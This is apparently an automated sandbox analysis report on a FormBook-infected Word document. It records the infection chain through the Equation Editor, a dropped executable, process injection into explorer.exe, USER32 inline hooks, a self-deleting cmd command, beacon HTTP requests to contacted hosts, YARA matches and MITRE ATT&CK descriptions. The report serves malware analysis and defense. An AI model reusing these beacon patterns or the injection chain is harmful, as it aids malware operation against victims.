Jan 27, 2021 19:10:30.996458054 CET	938	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 27 Jan 2021 18:10:30 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.theprintshop.ink/bsl/?NN=iMJGa3GxI6UtmkdzIO42CvbImt4iBZLhcRTuFhGcNs1w9EATRUa5v41vQqTOTJ8d8FsBhw==&Epu=zv50BpeHpnjp Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-HTTPS-Enforce: 1 X-Proxy-Cache-Info: DT:1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49171	208.91.197.39	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 27, 2021 19:11:05.625649929 CET	940	OUT	GET /bsl/?NN=GgBvVf5PQIOdcMEbYgw1IQ+nD3ax/bg71NWpn/5pwbnZwl7mOlCqEE4iezeCyF4VQz1gwg==&Epu=zv50BpeHpnjp HTTP/1.1 Host: www.bucklandnewton.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 27, 2021 19:11:05.869776964 CET	941	IN	HTTP/1.1 200 OK Date: Wed, 27 Jan 2021 18:11:05 GMT Server: Apache Set-Cookie: vsid=925vr3593166657424688; expires=Mon, 26-Jan-2026 18:11:05 GMT; Max-Age=157680000; path=/; domain=www.bucklandnewton.net; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_CyAXn8uf9Mysi+MO7CPSkVqz6yqftanfFoWO52v93D5j0wDoXMvz4iSdS45R+/NaLISga+bdi0mXfgcIY9qPNg== Keep-Alive: timeout=5, max=115 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 36 34 30 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 43 79 41 58 6e 38 75 66 39 4d 79 73 69 2b 4d 4f 37 43 50 53 6b 56 71 7a 36 79 71 66 74 61 6e 66 46 6f 57 4f 35 32 76 39 33 44 35 6a 30 77 44 6f 58 4d 76 7a 34 69 53 64 53 34 35 52 2b 2f 4e 61 4c 49 53 67 61 2b 62 64 69 30 6d 58 66 67 63 49 59 39 71 50 4e 67 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 75 63 6b 6c 61 6e 64 6e 65 77 74 6f 6e 2e 6e 65 74 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 75 63 6b 6c 61 6e 64 6e 65 77 74 6f 6e 2e 6e 65 74 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 Data Ascii: 6403<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_CyAXn8uf9Mysi+MO7CPSkVqz6yqftanfFoWO52v93D5j0wDoXMvz4iSdS45R+/NaLISga+bdi0mXfgcIY9qPNg=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.bucklandnewton.net/px.js?ch=1"></script><script type="text/javascript" src="http://www.bucklandnewton.net/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px"

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEA
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEA
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEA
GetMessageA	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEA

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2440 Parent PID: 584

General

Start time:	19:08:36
Start date:	27/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13ffc0000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 1976 Parent PID: 584

General

Start time:	19:08:38
Start date:	27/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 69577.exe PID: 1484 Parent PID: 1976

General

Start time:	19:08:41
Start date:	27/01/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\69577.exe
Imagebase:	0xcf0000
File size:	834536 bytes
MD5 hash:	5A7E3E87F007DA7D39BD5CB58CAC10D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 43%, ReversingLabs
Reputation:	low

Analysis Process: AddInProcess32.exe PID: 2824 Parent PID: 1484

General

Start time:	19:08:47
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Imagebase:	0xe00000
File size:	42176 bytes
MD5 hash:	DA55A7AED2F65D6104E1A79EE067CC00
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Analysis Process: explorer.exe PID: 1388 Parent PID: 2824

General

Start time:	19:08:52
Start date:	27/01/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: systray.exe PID: 2396 Parent PID: 1388

General

Start time:	19:09:10
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\systray.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\systray.exe
Imagebase:	0xc0000
File size:	8192 bytes
MD5 hash:	DF6923839C6A8F776F0DA704C5F4CEA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: cmd.exe PID: 2880 Parent PID: 2396

General

Start time:	19:09:15
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Imagebase:	0x4a9f0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report IMG-11862.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre